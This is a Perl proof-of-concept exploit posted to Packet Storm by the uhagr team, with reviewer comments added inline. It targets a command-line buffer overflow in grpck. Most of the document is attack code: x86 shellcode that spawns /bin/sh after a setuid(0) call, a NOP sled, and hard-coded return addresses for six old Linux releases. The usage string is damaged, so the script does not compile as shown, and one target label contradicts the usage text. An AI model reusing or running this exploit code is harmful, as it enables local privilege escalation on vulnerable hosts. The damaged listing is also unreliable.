Hi packetstorm dudez!

--- start here ---
#!/usr/bin/perl
# www.uhagr.org - ghostian@linuxmail.gr
# This is only a Proof of concept.
# /usr/sbin/grpck is not suid root by default.
# castle:~ # /usr/sbin/grpck `perl -e 'print "X"x2900'`
# Segmentation fault
# castle:~ #

# Reviewer note: the transcript above shows grpck faulting on a 2900-byte
# command-line argument, which suggests argv data is copied without a length
# check. Impact depends on the privileges of the binary: per the author it is
# not suid root by default, so on a default install it runs with the caller's
# own rights only. On audited hosts, confirm that grpck has not been given the
# setuid bit locally.
#
# The script declares no strictures (no "use strict" / "use warnings"); every
# variable except $usage is a package global.

# NOTE(review): this statement is damaged in this copy. It was presumably a
# here-document whose opening tag and first line were swallowed as an HTML
# tag during extraction; the trailing "x" looks like the terminator. The
# remaining text is kept verbatim, so the listing does not compile as shown.
my $usage = < Example: ./grpck-expl.pl 1 TARGETS: [ 1 ] SuSE Linux 7.2 [ 2 ] RedHat Linux 8.0 [ 3 ] RedHat Linux 7.3 [ 4 ] RedHat Linux 7.2 [ 5 ] Debian Linux 2.2 [ 6 ] Mandrake Linux 8.2 x

# Target selector: first command-line argument, compared as a string below.
$target = ($ARGV[0]);

# Opaque machine-code payload; the literal ends with the path "/bin/sh".
# NOTE(review): the leading bytes look like a setuid(0) call, which would
# only matter if grpck ran with elevated privileges - confirm against the
# author's remark that it is not suid root by default.
$shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
             "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
             "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
             "\x80\xe8\xdc\xff\xff\xff/bin/sh";

# No argument (or a false one such as "0"): print the usage text and stop.
if (!$target) { print "$usage\n"; exit; }

# Per-distribution table. Each branch sets a hard-coded stack address ($ret),
# an adjustment added to it ($offset), the byte count filled with the packed
# address ($buf), the size budget for the padding-plus-payload tail ($egg)
# and the padding byte ($nop).
# NOTE(review): because the addresses are fixed, the PoC depends on a
# specific stack layout; address-space randomization or a differently built
# binary would presumably invalidate these values.
# A selector that matches none of the six branches falls through with all of
# these variables undefined; nothing below rejects it.
if ($target eq '1') { $ret = 0xbfffe514; $offset = 940; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: SuSE Linux 7.2\n"; }
if ($target eq '2' ) { $ret = 0xbfffe5bc; $offset = 851; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: RedHat Linux 8.0\n"; }
if ($target eq '3' ) { $ret = 0xbfffef94; $offset = 1812; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: RedHat Linux 7.3\n"; }
if ($target eq '4' ) { $ret = 0xbfffe73c; $offset = 645; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: RedHat Linux 7.2\n"; }
# The label printed here ("Debian Linux 3.0r0") disagrees with the usage
# text, which lists target 5 as "Debian Linux 2.2".
if ($target eq '5' ) { $ret = 0xbfffe934; $offset = 1541; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: Debian Linux 3.0r0\n"; }
if ($target eq '6' ) { $ret = 0xbffff0ae; $offset = 1859; $buf = 2900; $egg = 2000; $nop = "\x90"; print "\n Target: Mandrake Linux 8.2\n"; }

# Pack $ret + $offset as a native-order 32-bit value.
$addr = pack('l', ($ret + $offset));

# Append the packed address once per 4 bytes of $buf.
for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; }

# Append padding bytes: $egg minus the payload length minus 100.
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) { $buffer .= $nop; }

# The payload goes last.
$buffer .= $shellcode;

print "r00t?\n";

# List-form exec: no shell is involved; $buffer is passed as the first
# argument to grpck and 0 as the second. On success exec does not return;
# its failure is not checked.
exec("/usr/sbin/grpck", $buffer,0);

# Have a nice night ;]
--- cut here ---

Thanks!
The uhagr team